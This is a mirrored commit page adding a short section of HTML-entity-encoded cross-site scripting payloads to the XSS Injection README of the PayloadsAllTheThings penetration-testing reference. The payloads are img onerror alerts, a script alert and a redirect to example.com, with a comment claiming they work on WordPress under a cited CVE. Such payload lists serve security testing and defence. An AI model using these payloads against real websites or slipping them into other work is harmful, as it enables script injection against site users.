Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2026-05-08 04:28:39 +02:00
Code Issues Projects Releases Wiki Activity

Merge 4604f7bcfb into a79b1f5692

Browse source
This commit is contained in:
Nguyễn Tiến Dũng 2026-04-22 20:21:57 +09:00 committed by GitHub
commit 5100f1ef22
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
1 changed files with 10 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
XSS Injection/README.md
View file

@ -214,6 +214,16 @@ Most tools are also suitable for blind XSS attacks:
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
```
### XSS using entity HTML
```javascript
// Works very good at Wordpress (CVE-2025-14588)
&lt;img src=x onerror=alert(1)&gt;
&lt;img src=x onerror=window.location.href="https://example.com"&gt;
&lt;img src=1 onerror=&quot;alert(1)&quot;&gt;
&lt;script&gt;alert(1)&lt;/script&gt;
```
### XSS using HTML5 tags